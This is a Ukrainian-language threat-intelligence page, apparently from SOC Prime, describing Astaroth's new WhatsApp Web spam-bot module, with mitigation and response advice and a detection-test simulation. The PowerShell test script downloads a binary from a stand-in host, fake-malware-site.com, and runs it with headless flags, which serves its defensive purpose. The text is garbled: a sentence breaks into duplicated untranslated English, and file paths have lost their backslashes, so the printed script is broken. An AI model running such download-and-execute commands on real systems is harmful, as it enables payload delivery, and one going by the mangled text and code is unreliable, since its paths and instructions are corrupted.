SOC Prime Bias: Високий

30 Jul 2026 15:38 UTC

Astaroth додає новий компонент спам-бота для електронних кампаній

Author Photo
SOC Prime Team linkedin icon Стежити
Astaroth додає новий компонент спам-бота для електронних кампаній
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Короткий огляд

Оператори ботнету Astaroth додали новий компонент спам-бота WhatsApp Web, щоб розширити свій вплив у екосистемі електронної злочинності Латинської Америки. Модуль використовує автоматизацію безголових браузерів, щоб перетворити компрометованих жертв на вузли розповсюдження, відправляючи шкідливі повідомлення їхнім контактам у WhatsApp. Цей розвиток знаменує собою перехід від традиційного поштового спаму до платформ соціальних мереж.

Розслідування

Розслідування включало детальний технічний аналіз спам-бота Astaroth, який виявив шифрування AES-CTS, складний шестистадійний процес обфускації рядків та налаштовувані конфігураційні структури. Дослідники ідентифікували значні подібності в коді між спам-ботами Astaroth і Vareg, що свідчить про спільних розробників або угоди про обмін кодом. Аналіз також підтвердив зловживання легітимними рамками автоматизації браузерів, включаючи WebDriver і WPPConnect/WA-JS, для запуску прихованих спам-кампаній.

Пом’якшення

Організації повинні навчати користувачів про соціальну інженерію на основі WhatsApp та знеохочувати відкривання або виконання файлів, отриманих від невідомих контактів. Захисти завантажень у браузері мають бути увімкнені, а несанкціоновані завантаження та виконання WebDriver мають ретельно контролюватися. Команди безпеки також повинні стежити за підозрілим створенням директорій у папці Temp Windows і розглянути можливість блокування WPPConnect/WA-JS, якщо він не потрібен для легітимного бізнес-використання.

Відповідь

Якщо виявлено активність Astaroth, постраждалі кінцеві точки повинні бути негайно ізольовані, щоб зупинити подальше розповсюдження спаму та доставку шкідливого програмного забезпечення. Розслідувачі повинні шукати безголові процеси браузерів і незвичні ChromeAuto_ каталоги в C:UsersPublicTemp. Ідентифіковані процеси WebDriver повинні пройти судово-медичний аналіз, а активність мережі повинна бути переглянута на наявність несанкціонованих з’єднань із відомою інфраструктурою командування і керування Astaroth.

Потік атаки

Виконання симуляції

Передумова: Перевірка телеметрії і базового рівня перед запуском повинна бути пройдена.

Рація: У цій секції деталізовано точне виконання тактики техніки супротивника (TTP), призначеної для активізації правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та мету генерувати точну телеметрію, очікувану логікою виявлення. Абстрактні або несуміжні приклади можуть призвести до неправильного діагнозу.

  • Атака наратива та команди: Супротивник має намір розгорнути автоматизований модуль спаму в WhatsApp. Для цього вони спочатку використовують техніку зловживання наявними інструментами, за допомогою PowerShell завантажують певний бінарний WebDriver у локальний каталог. Як тільки інструмент присутній, супротивник виконує бінарний файл за допомогою binary to a local directory. Once the tool is present, the adversary executes the binary using the --headless and --disable-infobars прапорів. Це дозволяє автоматизації працювати у фоновому режимі, невидимо для користувача, сприяючи спам-кампанії, одночасно зменшуючи залишковий слід на хості.

  • Скрипт регресійного тесту:

    # Скрипт симуляції спам-бота Astaroth
    # Цей скрипт імітує послідовність завантаження та виконання, визначену в правилі виявлення.
    
    $workDir = "$env:TEMPWebDriverSimulation"
    if (!(Test-Path $workDir)) { New-Item -Path $workDir -ItemType Directory }
    Set-Location $workDir
    
    # 1. Імітація завантаження (спрацьовує selection_webdriver_download)
    Write-Host "[+] Імітація завантаження WebDriver через PowerShell..."
    $dummyWebDriver = "WebDriver.exe"
    New-Item -Path $dummyWebDriver -ItemType File
    # Імітація командного рядка, який шукає правило
    powershell.exe -Command "Invoke-WebRequest -Uri 'http://fake-malware-site.com/WebDriver' -OutFile 'WebDriver.exe'"
    
    # 2. Імітація виконання (спрацьовує selection_webdriver_execution та selection_session_creation)
    Write-Host "[+] Імітація виконання WebDriver з безголовими прапорами..."
    # Ми використовуємо Start-Process, щоб забезпечити захоплення командного рядка як події створення процесу
    Start-Process -FilePath ".$dummyWebDriver" -ArgumentList "--headless", "--disable-infobars" -NoNewWindow
  • Команди очищення:

    # Очищення артефактів симуляції
    Remove-Item -Path "$env:TEMPWebDriverSimulation" -Recurse -Force
    Write-Host "[+] Очищення завершено."